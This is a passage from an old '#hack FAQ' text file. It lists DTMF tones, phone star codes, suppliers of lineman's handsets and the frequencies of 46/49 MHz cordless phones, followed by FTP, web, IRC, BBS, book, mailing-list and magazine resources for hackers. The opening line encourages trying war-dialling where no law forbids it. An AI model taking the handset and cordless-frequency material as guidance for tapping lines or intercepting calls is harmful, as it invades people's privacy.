IF YOU'VE GOT SOME CRAZY LAW SAYING YOU CAN'T DO IT. IF, AS IS
|
|||
|
LIKELY, THERE IS NO SUCH LAW, THE ONLY WAY TO FIND OUT WHAT HAPPENS IS
|
|||
|
TO GIVE IT A TRY.
|
|||
|
-EQ-
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (77/3400)
|
|||
|
IT SHOULD BE NOTED THAT A LAW MAKING SCANNING ILLEGAL WAS RECENTLY
|
|||
|
PASSED IN COLORADO SPRINGS, CO. IT IS NOW ILLEGAL TO PLACE A CALL
|
|||
|
IN COLORADO SPRINGS WITHOUT THE INTENT TO COMMUNICATE.
|
|||
|
|
|||
|
|
|||
|
21. WHERE CAN I PURCHASE A LINEMAN'S HANDSET?
|
|||
|
|
|||
|
CONTACT EAST
|
|||
|
335 WILLOW STREET
|
|||
|
NORTH ANDOVER, MA 01845-5995
|
|||
|
(508)682-2000
|
|||
|
|
|||
|
JENSEN TOOLS
|
|||
|
7815 S. 46TH STREET
|
|||
|
PHOENIX, AZ 85044-5399
|
|||
|
|
|||
|
TIME MOTION TOOLS
|
|||
|
12778 BROOKPRINTER PLACE
|
|||
|
POWAY, CA 92064
|
|||
|
(619)679-0303
|
|||
|
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (77/3422)
|
|||
|
22. WHAT ARE THE DTMF FREQUENCIES?
|
|||
|
|
|||
|
DTMF STANDS FOR DUAL TONE MULTI FREQUENCY. THESE ARE THE TONES YOU
|
|||
|
GET WHEN YOU PRESS A KEY ON YOUR TELEPHONE TOUCHPAD. THE TONE OF THE
|
|||
|
BUTTON IS THE SUM OF THE COLUMN AND ROW TONES. THE ABCD KEYS DO NOT
|
|||
|
EXIST ON STANDARD TELEPHONES.
|
|||
|
|
|||
|
|
|||
|
1209 1336 1477 1633
|
|||
|
|
|||
|
697 1 2 3 A
|
|||
|
|
|||
|
770 4 5 6 B
|
|||
|
|
|||
|
852 7 8 9 C
|
|||
|
|
|||
|
941 * 0 # D
|
|||
|
|
|||
|
|
|||
|
23. WHAT ARE ALL OF THE * CODES?
|
|||
|
|
|||
|
LOCAL AREA SIGNALLING SERVICES (LASS) AND CUSTOM CALLING FEATURE
|
|||
|
|
|||
|
#hack FAQ (77/3444)
|
|||
|
CONTROL CODES:
|
|||
|
|
|||
|
(THESE APPEAR TO BE STANDARD, BUT MAY BE CHANGED LOCALLY)
|
|||
|
|
|||
|
*57 CUSTOMER ORIGNATED TRACE (COT) ACTIVATION
|
|||
|
*60 SELECTIVE CALL REJECTION (SCR) ACTIVATION
|
|||
|
*61 SELECTIVE DISTINCTIVE ALERTING (SDA) ACTIVATION
|
|||
|
*62 SELECTIVE CALL ACCEPTANCE (SCA) ACTIVATION
|
|||
|
*63 SELECTIVE CALL FORWARDING (SCF) ACTIVATION
|
|||
|
*65 ICLID ACTIVATION (CALLER ID)
|
|||
|
*66 AUTOMATIC RECALL (AR) ACTIVATION
|
|||
|
*67 CALL PRIVACY TOGGLE
|
|||
|
*68 COMPUTER ACCESS RESTRICTION TOGGLE
|
|||
|
*68 COMPUTER ACCESS RESTRICTION TOGGLE
|
|||
|
*69 AC ACTIVATION
|
|||
|
*70 CALL WAITING DISABLE
|
|||
|
*71 RING, NO-ANSWER FORWARD ACTIVATION
|
|||
|
*72 CALL FORWARDING IMMEDIATE ACTIVATION
|
|||
|
*73 CALL FORWARDING DEACTIVATION
|
|||
|
*74 SPEED CALL 8 PROGRAM
|
|||
|
*80 SCR DEACTIVATION
|
|||
|
*81 SDA DEACTIVATION
|
|||
|
|
|||
|
#hack FAQ (77/3466)
|
|||
|
*82 SCA DEACTIVATION
|
|||
|
*83 SCF DEACTIVATION
|
|||
|
*85 ICLID DEACTIVATION
|
|||
|
*86 AR DEACTIVATION
|
|||
|
*89 AC DEACTIVATION
|
|||
|
|
|||
|
|
|||
|
24. WHAT FREQUENCIES DO CORDLESS PHONES OPERATE ON?
|
|||
|
|
|||
|
HERE ARE THE FREQUENCIES FOR THE FIRST GENERATION 46/49MHZ PHONES.
|
|||
|
THE NEW 900MHZ CORLESS PHONES ARE NOT COVERED.
|
|||
|
|
|||
|
CHANNEL HANDSET TRANSMIT BASE TRANSMIT
|
|||
|
------- ---------------- -------------
|
|||
|
1 49.670MHZ 46.610MHZ
|
|||
|
2 49.845 46.630
|
|||
|
3 49.860 46.670
|
|||
|
4 49.770 46.710
|
|||
|
5 49.875 46.730
|
|||
|
6 49.830 46.770
|
|||
|
7 49.890 46.830
|
|||
|
8 49.930 46.870
|
|||
|
|
|||
|
#hack FAQ (77/3488)
|
|||
|
9 49.990 46.930
|
|||
|
10 49.970 46.970
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SECTION C: RESOURCES
|
|||
|
~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
|
|||
|
01. WHAT ARE SOME FTP SITES OF INTEREST TO HACKERS?
|
|||
|
|
|||
|
AQL.GATECH.EDU
|
|||
|
BELLCORE.COM
|
|||
|
BRIC-A-BRAC.APPLE.COM
|
|||
|
CERT.ORG
|
|||
|
CRIMELAB.COM
|
|||
|
CYBERSPACE.COM
|
|||
|
DEIMOS.CS.UAH.EDU
|
|||
|
F.MS.UKY.EDU /PUB/MISC
|
|||
|
FREESIDE.COM
|
|||
|
FTP.ARMORY.COM /PUB/USER/KMARTIND/PROG
|
|||
|
|
|||
|
#hack FAQ (77/3510)
|
|||
|
FTP.CLARK.NET /PUB/JCASE
|
|||
|
FTP.CSUA.BERKELEY.EDU /PUB/CYPHERPUNKS
|
|||
|
FTP.EFF.ORG /PUB/CUD
|
|||
|
FTP.ETEXT.ORG
|
|||
|
FTP.MCS.COM /MCSNET.USERS/CRISADM/STUFF/RESEARCH/SAMPLES
|
|||
|
FTP.NETCOM.COM /PUB/ZZYZX
|
|||
|
FTP.NETCOM.COM /PUB/BRADLEYM
|
|||
|
FTP.RAHUL.NET /PUB/LPS
|
|||
|
FTP.STD.COM /OBI/MISCHIEF/ AND /ARCHIVES/ALT.LOCKSMITHING
|
|||
|
FTP.WARWICK.AC.UK
|
|||
|
FTP.WIN.TUE.NL
|
|||
|
FTP.WINTERNET.COM /USERS/CRAIGB
|
|||
|
GARBO.UWASA.FI /PC/CRYPT
|
|||
|
GHOST.DSI.UNIMI.IT /PUB/CRYPT
|
|||
|
GRANUAILE.IEUNET.IE
|
|||
|
GREGORIO.STANFORD.EDU
|
|||
|
GRIND.ISCA.UIWA.EDU
|
|||
|
HACK-THIS.PC.CC.CMU.EDU
|
|||
|
HALCYON.COM
|
|||
|
IDEAL.IOS.NET
|
|||
|
LCS.MIT.EDU /* TELECOM ARCHIVES */
|
|||
|
MARTIGNY.AI.MIT.EDU
|
|||
|
|
|||
|
#hack FAQ (77/3532)
|
|||
|
MARY.IIA.ORG /PUB/USERS/PATRIOT
|
|||
|
NIC.FUNET.FI /PUB/DOC/CUD
|
|||
|
PARADOX1.DENVER.COLORADO.EDU /ANONYMOUS/TEXT-FILES/PYROTECHNICS/
|
|||
|
PYRITE.RUTGERS.EDU
|
|||
|
RENA.DIT.CO.JP
|
|||
|
RIPEM.MSU.EDU /PUB/CRYPT
|
|||
|
RTFM.MIT.EDU
|
|||
|
SEKURITY.COM
|
|||
|
SPY.ORG
|
|||
|
THETA.IIS.U-TOKYO.AC.JP /PUB1/SECURITY
|
|||
|
TITANIA.MATHEMATIK.UNI-ULM.DE
|
|||
|
UCENG.UC.EDU
|
|||
|
WIMSEY.BC.CA /PUB/CRYPTO
|
|||
|
WORLD.STD.COM
|
|||
|
|
|||
|
|
|||
|
02. WHAT ARE SOME NEWSGROUPS OF INTEREST TO HACKERS?
|
|||
|
|
|||
|
ALT.2600 DO IT 'TIL IT HERTZ
|
|||
|
ALT.2600.HOPE.TECH TECHNOLOGY CONCERNS FOR HACKERS ON PLANET EARTH 1994
|
|||
|
ALT.CELLULAR
|
|||
|
ALT.DCOM.TELECOM
|
|||
|
|
|||
|
#hack FAQ (77/3554)
|
|||
|
ALT.HACKERS DESCRIPTIONS OF PROJECTS CURRENTLY UNDER
|
|||
|
|
|||
|
|
|||
|
|
|||
|
DEVELOPMENT (MODERATED)
|
|||
|
ALT.LOCKSMITHING YOU LOCKED YOUR KEYS IN *WHERE*?
|
|||
|
ALT.HACKERS.MALICIOUS THE REALLY BAD GUYS - DON'T TAKE CANDY FROM THEM
|
|||
|
ALT.PRIVACY.ANON-SERVER
|
|||
|
ALT.SECURITY SECURITY ISSUES ON COMPUTER SYSTEMS
|
|||
|
ALT.SECURITY.INDEX POINTERS TO GOOD STUFF IN MISC.SECURITY (MODERATED)
|
|||
|
ALT.SECURITY.KEYDIST EXCHANGE OF KEYS FOR PUBLIC KEY ENCRYPTION SYSTEMS
|
|||
|
ALT.SECURITY.PGP THE PRETTY GOOD PRIVACY PACKAGE
|
|||
|
ALT.SECURITY.RIPEM A SECURE EMAIL SYSTEM ILLEGAL TO EXPORT FROM THE US
|
|||
|
COMP.DCOM.CELLULAR
|
|||
|
COMP.DCOM.TELCOM.TECH
|
|||
|
COMP.DCOM.TELECOM TELECOMMUNICATIONS DIGEST (MODERATED)
|
|||
|
COMP.DCOM.TELECOM.TECH
|
|||
|
COMP.ORG.CPSR.ANNOUNCE
|
|||
|
COMP.ORG.CPSR.TALK
|
|||
|
COMP.ORG.EFF
|
|||
|
COMP.ORG.EFF
|
|||
|
COMP.RISKS
|
|||
|
|
|||
|
#hack FAQ (77/3576)
|
|||
|
COMP.SECURITY.ANNOUNCE
|
|||
|
COMP.SECURITY.MISC SECURITY ISSUES OF COMPUTERS AND NETWORKS
|
|||
|
COMP.SECURITY.UNIX DISCUSSION OF UNIX SECURITY
|
|||
|
COMP.VIRUS COMPUTER VIRUSES & SECURITY (MODERATED)
|
|||
|
MISC.SECURITY SECURITY IN GENERAL, NOT JUST COMPUTERS (MODERATED)
|
|||
|
REC.PYROTECHNICS
|
|||
|
SCI.CRYPT DIFFERENT METHODS OF DATA EN/DECRYPTION
|
|||
|
|
|||
|
|
|||
|
03. WHAT ARE SOME TELNET SITES OF INTEREST TO HACKERS?
|
|||
|
|
|||
|
PHRED.PC.CC.CMU.EDU
|
|||
|
|
|||
|
|
|||
|
04. WHAT ARE SOME GOPHER SITES OF INTEREST TO HACKERS?
|
|||
|
|
|||
|
GOPHER.CPSR.ORG
|
|||
|
GOPHER.EFF.ORG
|
|||
|
GOPHER.PHRED.ORG
|
|||
|
GOPHER.WIRED.COM
|
|||
|
WIRETAP.SPIES.COM
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (78/3599)
|
|||
|
05. WHAT ARE SOME WORLD WIDE WEB (WWW) SITES OF INTEREST TO HACKERS?
|
|||
|
|
|||
|
HTTP://CRIMELAB.COM//BUGTRAQ/BUGTRAQ/HTML
|
|||
|
HTTP://CS.PURDUE.EDU/HOMES/SPAF/COAST.HTML
|
|||
|
HTTP://CS.PURDUE.EDU/HOMES/SPAF/PCERT.HTML
|
|||
|
HTTP://DFW.NET/~ALEPH1
|
|||
|
HTTP://FIRST.ORG
|
|||
|
HTTP://L0PHT.COM
|
|||
|
HTTP://TAMSUN.TAMU.EDU/~CLM3840/HACKING.HTML/
|
|||
|
HTTP://TANSU.COM.AU/INFO/SECURITY.HTML
|
|||
|
HTTP://THE-TECH.MIT.EDU (LAMACCHIA CASE INFO)
|
|||
|
HTTP://WWW.ACHILLES.NET/~PLUVIUS
|
|||
|
HTTP://WWW.TIS.COM/
|
|||
|
HTTP://WWW.CPSR.ORG/HOME
|
|||
|
HTTP://WWW.IIA.ORG/~GAUTIER/ME.HTML
|
|||
|
HTTP://WWW.ENGIN.UMICH.EDU/~JGOTTS/UNDERGROUND.HTML
|
|||
|
HTTP://WWW.NET23.COM
|
|||
|
HTTP: /WWW.PARANOIA.COM /DEFCON
|
|||
|
HTTP://WWW.PHANTOM.COM/~KING
|
|||
|
HTTP://WWW.PHRED.ORG
|
|||
|
HTTP://WWW.SPY.ORG /SECURITY/LOCAL/NEWS
|
|||
|
HTTP://WWW.WIRED.COM
|
|||
|
|
|||
|
#hack FAQ (80/3623)
|
|||
|
06. WHAT ARE SOME IRC CHANNELS OF INTEREST TO HACKERS?
|
|||
|
|
|||
|
#2600
|
|||
|
#HACK
|
|||
|
#PHREAK
|
|||
|
#LINUX
|
|||
|
#ROOT
|
|||
|
#UNIX
|
|||
|
#WAREZ
|
|||
|
|
|||
|
|
|||
|
07. WHAT ARE SOME BBS'S OF INTEREST TO HACKERS?
|
|||
|
|
|||
|
HACKER'S HAVEN (303)343-4053
|
|||
|
CORRUPT SEKURITY (303)753-1719
|
|||
|
INDEPENDENT NATION (315)656-4179 NUP: NONUP
|
|||
|
UNDERWORLD_1994.COM (514)683-1894
|
|||
|
DIGITAL FALLOUT (516)378-6640
|
|||
|
FARM R0AD 666 (713)855-0261
|
|||
|
|
|||
|
|
|||
|
08. WHAT BOOKS ARE AVAILABLE ON THIS SUBJECT?
|
|||
|
|
|||
|
#hack FAQ (82/3647)
|
|||
|
GENERAL COMPUTER SECURITY
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
COMPUTER SECURITY BASICS
|
|||
|
AUTHOR: DEBORAH RUSSELL AND G.T. GENGEMI SR.
|
|||
|
PUBLISHER: O'REILLY & ASSOCIATES, INC.
|
|||
|
COPYRIGHT DATE: 1991
|
|||
|
ISBN: 0-937175-71-4
|
|||
|
|
|||
|
|
|||
|
THIS IS AN EXCELLENT BOOK. IT GIVES A BROAD OVERVIEW OF
|
|||
|
|
|||
|
COMPUTER SECURITY WITHOUT SACRIFICING DETAIL. A MUST READ FOR
|
|||
|
|
|||
|
THE BEGINNING SECURITY EXPERT.
|
|||
|
|
|||
|
COMPUTER SECURITY MANAGEMENT
|
|||
|
AUTHOR: KAREN FORCHT
|
|||
|
PUBLISHER: BOYD AND FRASER
|
|||
|
COPYRIGHT DATE: 1994
|
|||
|
ISBN: 0-87835-881-1
|
|||
|
|
|||
|
INFORMATION SYSTEMS SECURITY
|
|||
|
|
|||
|
#hack FAQ (82/3669)
|
|||
|
AUTHOR: PHILIP FITES AND MARTIN KRATZ
|
|||
|
PUBLISHER: VAN NOSTRAD REINHOLD
|
|||
|
COPYRIGHT DATE: 1993
|
|||
|
ISBN: 0-442-00180-0
|
|||
|
|
|||
|
|
|||
|
UNIX SYSTEM SECURITY
|
|||
|
~~~~~~~~~~~~~~~~~~~~
|
|||
|
PRACTICAL UNIX SECURITY
|
|||
|
AUTHOR: SIMSON GARFINKEL AND GENE SPAFFORD
|
|||
|
PUBLISHER: O'REILLY & ASSOCIATES, INC.
|
|||
|
COPYRIGHT DATE: 1991
|
|||
|
ISBN: 0-937175-72-2
|
|||
|
|
|||
|
|
|||
|
FINALLY SOMEONE WITH A VERY FIRM GRASP OF UNIX SYSTEM SECURITY
|
|||
|
|
|||
|
GETS DOWN TO WRITING A BOOK ON THE SUBJECT. BUY THIS BOOK.
|
|||
|
|
|||
|
READ THIS BOOK.
|
|||
|
|
|||
|
FIREWALLS AND INTERNET SECURITY
|
|||
|
|
|||
|
#hack FAQ (82/3691)
|
|||
|
AUTHOR: WILLIAM CHESWICK AND STEVEN BELLOVIN
|
|||
|
PUBLISHER: ADDISON WESLEY
|
|||
|
COPYRIGHT DATE: 1994
|
|||
|
ISBN: 0-201-63357-4
|
|||
|
|
|||
|
UNIX SYSTEM SECURITY
|
|||
|
AUTHOR: RIK FARROW
|
|||
|
PUBLISHER: ADDISON WESLEY
|
|||
|
COPYRIGHT DATE: 1991
|
|||
|
ISBN: 0-201-57030-0
|
|||
|
|
|||
|
UNIX SECURITY: A PRACTICAL TUTORIAL
|
|||
|
AUTHOR: N. DEREK ARNOLD
|
|||
|
PUBLISHER: MCGRAW HILL
|
|||
|
COPYRIGHT DATE: 1993
|
|||
|
ISBN: 0-07-002560-6
|
|||
|
|
|||
|
UNIX SYSTEM SECURITY: A GUIDE FOR USERS AND SYSTEMS ADMINISTRATORS
|
|||
|
AUTHOR: DAVID A. CURRY
|
|||
|
PUBLISHER: ADDISON-WESLEY
|
|||
|
COPYRIGHT DATE: 1992
|
|||
|
ISBN: 0-201-56327-4
|
|||
|
|
|||
|
#hack FAQ (83/3714)
|
|||
|
UNIX SYSTEM SECURITY
|
|||
|
AUTHOR: PATRICK H. WOOD AND STEPHEN G. KOCHAN
|
|||
|
PUBLISHER: HAYDEN BOOKS
|
|||
|
COPYRIGHT DATE: 1985
|
|||
|
ISBN: 0-672-48494-3
|
|||
|
|
|||
|
|
|||
|
NETWORK SECURITY
|
|||
|
~~~~~~~~~~~~~~~~
|
|||
|
NETWORK SECURITY SECRETS
|
|||
|
AUTHOR: DAVID J. STANG AND SYLVIA MOON
|
|||
|
PUBLISHER: IDG BOOKS
|
|||
|
COPYRIGHT DATE: 1993
|
|||
|
ISBN: 1-56884-021-7
|
|||
|
|
|||
|
|
|||
|
NOT A TOTAL WASTE OF PAPER, BUT DEFINITELY NOT WORTH THE
|
|||
|
|
|||
|
$49.95 PURCHASE PRICE. THE BOOK IS A REHASH OF PREVIOUSLY
|
|||
|
|
|||
|
PUBLISHED INFORMATION. THE ONLY SECRET WE LEARN FROM READING
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (83/3736)
|
|||
|
THE BOOK IS THAT SYLVIA MOON IS A YOUNGER WOMAN MADLY IN LOVE
|
|||
|
|
|||
|
WITH THE OLDER DAVID STANG.
|
|||
|
|
|||
|
COMPLETE LAN SECURITY AND CONTROL
|
|||
|
AUTHOR: PETER DAVIS
|
|||
|
PUBLISHER: WINDCREST / MCGRAW HILL
|
|||
|
COPYRIGHT DATE: 1994
|
|||
|
ISBN: 0-8306-4548-9 AND 0-8306-4549-7
|
|||
|
|
|||
|
NETWORK SECURITY
|
|||
|
AUTHOR: STEVEN SHAFFER AND ALAN SIMON
|
|||
|
PUBLISHER: AP PROFESSIONAL
|
|||
|
COPYRIGHT DATE: 1994
|
|||
|
ISBN: 0-12-638010-4
|
|||
|
|
|||
|
|
|||
|
CRYPTOGRAPHY
|
|||
|
~~~~~~~~~~~~
|
|||
|
APPLIED CRYPTOGRAPHY: PROTOCOLS, ALGORITHMS, AND SOURCE CODE IN C
|
|||
|
AUTHOR: BRUCE SCHNEIER
|
|||
|
PUBLISHER: JOHN WILEY & SONS
|
|||
|
|
|||
|
#hack FAQ (83/3758)
|
|||
|
COPYRIGHT DATE: 1994
|
|||
|
ISBN: 0-471-59756-2
|
|||
|
|
|||
|
|
|||
|
BRUCE SCHNEIER'S BOOK REPLACES ALL OTHER TEXTS ON
|
|||
|
|
|||
|
CRYPTOGRAPHY. IF YOU ARE INTERESTED IN CRYPTOGRAPHY, THIS IS
|
|||
|
|
|||
|
A MUST READ. THIS MAY BE THE FIRST AND LAST BOOK ON
|
|||
|
|
|||
|
CRYPTOGRAPHY YOU MAY EVER NEED TO BUY.
|
|||
|
|
|||
|
CRYPTOGRAPHY AND DATA SECURITY
|
|||
|
AUTHOR: DOROTHY DENNING
|
|||
|
PUBLISHER: ADDISON-WESLEY PUBLISHING CO.
|
|||
|
COPYRIGHT DATE: 1982
|
|||
|
ISBN: 0-201-10150-5
|
|||
|
|
|||
|
PROGRAMMED THREATS
|
|||
|
~~~~~~~~~~~~~~~~~~
|
|||
|
THE LITTLE BLACK BOOK OF COMPUTER VIRUSES
|
|||
|
AUTHOR: MARK LUDWIG
|
|||
|
|
|||
|
#hack FAQ (83/3780)
|
|||
|
PUBLISHER: AMERICAN EAGLE PUBLICATIONS
|
|||
|
COPYRIGHT DATE: 1990
|
|||
|
ISBN: 0-929408-02-0
|
|||
|
|
|||
|
|
|||
|
THE ORIGINAL, AND STILL THE BEST, BOOK ON COMPUTER VIRUSES.
|
|||
|
|
|||
|
NO MEDIA HYPE HERE, JUST GOOD CLEAN TECHNICAL INFORMATION.
|
|||
|
|
|||
|
COMPUTER VIRUSES, ARTIFICIAL LIFE AND EVOLUTION
|
|||
|
AUTHOR: MARK LUDWIG
|
|||
|
PUBLISHER: AMERICAN EAGLE PUBLICATIONS
|
|||
|
COPYRIGHT DATE: 1993
|
|||
|
ISBN: 0-929408-07-1
|
|||
|
|
|||
|
COMPUTER VIRUSES, WORMS, DATA DIDDLERS, KILLER PROGRAMS, AND OTHER
|
|||
|
|
|||
|
THREATS TO YOUR SYSTEM
|
|||
|
AUTHOR: JOHN MCAFEE AND COLIN HAYNES
|
|||
|
PUBLISHER: ST. MARTIN'S PRESS
|
|||
|
COPYRIGHT DATE: 1989
|
|||
|
ISBN: 0-312-03064-9 AND 0-312-02889-X
|
|||
|
|
|||
|
#hack FAQ (85/3804)
|
|||
|
HACKING HISTORY AND CULTURE
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
THE HACKER CRACKDOWN: LAW AND DISORDER ON THE ELECTRONIC FRONTIER
|
|||
|
AUTHOR: BRUCE STERLING
|
|||
|
PUBLISHER: BANTAM BOOKS
|
|||
|
COPYRIGHT DATE: 1982
|
|||
|
ISBN: 0-553-56370-X
|
|||
|
|
|||
|
|
|||
|
BRUCE STERLING HAS RECENTLY RELEASED THE BOOK FREE TO THE NET.
|
|||
|
|
|||
|
THE BOOK IS MUCH EASIER TO READ IN PRINT FORM, AND THE
|
|||
|
|
|||
|
PAPERBACK IS ONLY $5.99. EITHER WAY YOU READ IT, YOU WILL BE
|
|||
|
|
|||
|
GLAD YOU DID. MR. STERLING IS AN EXCELLENT SCIENCE FICTION
|
|||
|
|
|||
|
AUTHOR AND HAS BROUGHT HIS TALENT WITH WORDS TO BEAR ON THE
|
|||
|
|
|||
|
HACKING CULTURE. A VERY ENJOYABLE READING EXPERIENCE.
|
|||
|
|
|||
|
CYBERPUNK
|
|||
|
|
|||
|
#hack FAQ (85/3826)
|
|||
|
AUTHOR: KATIE HAFNER AND JOHN MARKOFF
|
|||
|
PUBLISHER: SIMON AND SCHUSTER
|
|||
|
COPYRIGHT DATE: 1991
|
|||
|
ISBN: 0-671-77879-X
|
|||
|
|
|||
|
THE CUCKOO'S EGG
|
|||
|
AUTHOR: CLIFF STOLL
|
|||
|
PUBLISHER: SIMON AND SCHUSTER
|
|||
|
COPYRIGHT DATE: 1989
|
|||
|
ISBN: 0-671-72688-9
|
|||
|
|
|||
|
HACKERS: HEROES OF THE COMPUTER REVOLUTION
|
|||
|
AUTHOR: STEVEN LEVY
|
|||
|
PUBLISHER: DOUBLEDAY
|
|||
|
COPYRIGHT DATE: 1984
|
|||
|
ISBN: 0-440-13495-6
|
|||
|
|
|||
|
|
|||
|
UNCLASSIFIED
|
|||
|
~~~~~~~~~~~~
|
|||
|
THE HACKER'S HANDBOOK
|
|||
|
AUTHOR: HUGO CORNWALL
|
|||
|
|
|||
|
#hack FAQ (85/3848)
|
|||
|
PUBLISHER: E. ARTHUR BROWN COMPANY
|
|||
|
COPYRIGHT DATE:
|
|||
|
ISBN: 0-912579-06-4
|
|||
|
|
|||
|
SECRETS OF A SUPER HACKER
|
|||
|
AUTHOR: THE KNIGHTMARE
|
|||
|
PUBLISHER: LOOMPANICS
|
|||
|
COPYRIGHT DATE: 1994
|
|||
|
ISBN: 1-55950-106-5
|
|||
|
|
|||
|
|
|||
|
THE KNIGHTMARE IS NO SUPER HACKER. THERE IS LITTLE OR NO REAL
|
|||
|
|
|||
|
INFORMATION IN THIS BOOK. THE KNIGHTMARE GIVES USEFUL ADVICE
|
|||
|
|
|||
|
LIKE TELLING YOU NOT TO DRESS UP BEFORE GOING TRASHING.
|
|||
|
|
|||
|
THE KNIGHTMARE'S BEST HACK IS FOOLING LOOMPANICS INTO
|
|||
|
|
|||
|
PUBLISHING THIS GARBAGE.
|
|||
|
|
|||
|
THE DAY THE PHONES STOPPED
|
|||
|
|
|||
|
#hack FAQ (85/3870)
|
|||
|
AUTHOR: LEONARD LEE
|
|||
|
PUBLISHER: PRIMUS / DONALD I FINE, INC.
|
|||
|
COPYRIGHT DATE: 1992
|
|||
|
ISBN: 1-55611-286-6
|
|||
|
|
|||
|
|
|||
|
TOTAL GARBAGE. PARANOID DELUSIONS OF A LUNATIC. LESS FACTUAL
|
|||
|
|
|||
|
DATA THAT AN AVERAGE ISSUE OF THE ENQUIRER.
|
|||
|
|
|||
|
INFORMATION WARFARE
|
|||
|
AUTHOR: WINN SWARTAU
|
|||
|
PUBLISHER: THUNDER MOUNTAIN PRESS
|
|||
|
COPYRIGHT DATE: 1994
|
|||
|
ISBN: 1-56025-080-1
|
|||
|
|
|||
|
|
|||
|
09. WHAT ARE SOME MAILING LISTS OF INTEREST TO HACKERS?
|
|||
|
|
|||
|
ACADEMIC FIREWALLS
|
|||
|
REFLECTOR ADDRESS:
|
|||
|
REGISTRATION ADDRESS: SEND A MESSAGE TO MAJORDOMO@GREATCIRCLE.COM
|
|||
|
|
|||
|
#hack FAQ (86/3893)
|
|||
|
CONTAINING THE LINE "SUBSCRIBE FIREWALLS USER@HOST"
|
|||
|
|
|||
|
BUGTRAQ
|
|||
|
REFLECTOR ADDRESS: BUGTRAQ@CRIMELAB.COM
|
|||
|
REGISTRATION ADDRESS: BUGTRAQ-REQUEST@CRIMELAB.COM
|
|||
|
|
|||
|
CERT TOOLS
|
|||
|
REFLECTOR ADDRESS: CERT-TOOLS@CERT.ORG
|
|||
|
REGISTRATION ADDRESS: CERT-TOOLS-REQUEST@CERT.ORG
|
|||
|
|
|||
|
COMPUTERS AND SOCIETY
|
|||
|
REFLECTOR ADDRESS: COMP-SOC@LIMBO.INTUITIVE.COM
|
|||
|
REGISTRATION ADDRESS: TAYLOR@LIMBO.INTUITIVE.COM
|
|||
|
|
|||
|
COORDINATED FEASIBILITY EFFORT TO UNRAVEL STATE DATA
|
|||
|
REFLECTOR ADDRESS: LDC-SW@CPSR.ORG
|
|||
|
REGISTRATION ADDRESS:
|
|||
|
|
|||
|
CPSR ANNOUNCEMENT LIST
|
|||
|
REFLECTOR ADDRESS: CPSR-ANNOUNCE@CPSR.ORG
|
|||
|
REGISTRATION ADDRESS:
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (86/3915)
|
|||
|
CPSR - INTELLECTUAL PROPERTY
|
|||
|
REFLECTOR ADDRESS: CPSR-INT-PROP@CPSR.ORG
|
|||
|
REGISTRATION ADDRESS:
|
|||
|
|
|||
|
CPSR - INTERNET LIBRARY
|
|||
|
REFLECTOR ADDRESS: CPSR-LIBRARY@CPSR.ORG
|
|||
|
REGISTRATION ADDRESS:
|
|||
|
|
|||
|
MACINTOSH SECURITY
|
|||
|
REFLECTOR ADDRESS: MAC-SECURITY@ECLECTIC.COM
|
|||
|
REGISTRATION ADDRESS: MAC-SECURITY-REQUEST@ECLECTIC.COM
|
|||
|
|
|||
|
NEXT MANAGERS
|
|||
|
REFLECTOR ADDRESS:
|
|||
|
REGISTRATION ADDRESS: NEXT-MANAGERS-REQUEST@STOLAF.EDU
|
|||
|
|
|||
|
RFC931-USERS
|
|||
|
REFLECTOR ADDRESS: RFC931-USERS@KRAMDEN.ACF.NYU.EDU
|
|||
|
REGISTRATION ADDRESS: BRNSTND@NYU.EDU
|
|||
|
|
|||
|
RSA USERS
|
|||
|
REFLECTOR ADDRESS: RSAREF-USERS@RSA.COM
|
|||
|
|
|||
|
#hack FAQ (86/3937)
|
|||
|
REGISTRATION ADDRESS: RSAREF-USERS-REQUEST@RSA.COM
|
|||
|
|
|||
|
|
|||
|
10. WHAT ARE SOME PRINT MAGAZINES OF INTEREST TO HACKERS?
|
|||
|
|
|||
|
2600 - THE HACKER QUARTERLY
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
E-MAIL ADDRESS: 2600@WELL.SF.CA.US
|
|||
|
|
|||
|
SUBSCRIPTION ADDRESS: 2600 SUBSCRIPTION DEPT
|
|||
|
PO BOX 752
|
|||
|
MIDDLE ISLAND, NY 11953-0752
|
|||
|
|
|||
|
LETTERS AND ARTICLE SUBMISSION ADDRESS: 2600 EDITORIAL DEPT
|
|||
|
PO BOX 99
|
|||
|
MIDDLE ISLAND, NY 11953-0099
|
|||
|
|
|||
|
SUBSCRIPTIONS: UNITED STATES: $21/YR INDIVIDUAL, $50 CORPORATE.
|
|||
|
OVERSEAS: $30/YR INDIVIDUAL, $65 CORPORATE.
|
|||
|
|
|||
|
|
|||
|
GRAY AREAS
|
|||
|
|
|||
|
#hack FAQ (86/3959)
|
|||
|
~~~~~~~~~~
|
|||
|
GRAY AREAS EXAMINES GRAY AREAS OF LAW AND MORALITY AND SUBJECT MATTER
|
|||
|
WHICH IS ILLEGAL, IMMORAL AND/OE CONTROVERSIAL. GRAY AREAS EXPLORES
|
|||
|
WHY HACKERS HACK AND PUTS HACKING INTO A SOCIOLOGICAL FRAMEWORK OF
|
|||
|
DEVIANT BEHAVIOR.
|
|||
|
|
|||
|
E-MAIL ADDRESS: GRAYAREA@WELL.SF.CA.US
|
|||
|
E-MAIL ADDRESS: GRAYAREA@NETAXS.COM
|
|||
|
|
|||
|
U.S. MAIL ADDRESS: GRAY AREAS
|
|||
|
PO BOX 808
|
|||
|
BROOMALL, PA 19008
|
|||
|
|
|||
|
SUBSCRIPTIONS: $26.00 4 ISSUES FIRST CLASS
|
|||
|
$34.00 4 ISSUES FOREIGN (SHIPPED AIR MAIL)
|
|||
|
|
|||
|
|
|||
|
WIRED
|
|||
|
~~~~~
|
|||
|
SUBSCRIPTION ADDRESS: SUBSCRIPTIONS@WIRED.COM
|
|||
|
OR: WIRED
|
|||
|
PO BOX 191826
|
|||
|
|
|||
|
#hack FAQ (86/3981)
|
|||
|
SAN FRANCISCO, CA 94119-9866
|
|||
|
|
|||
|
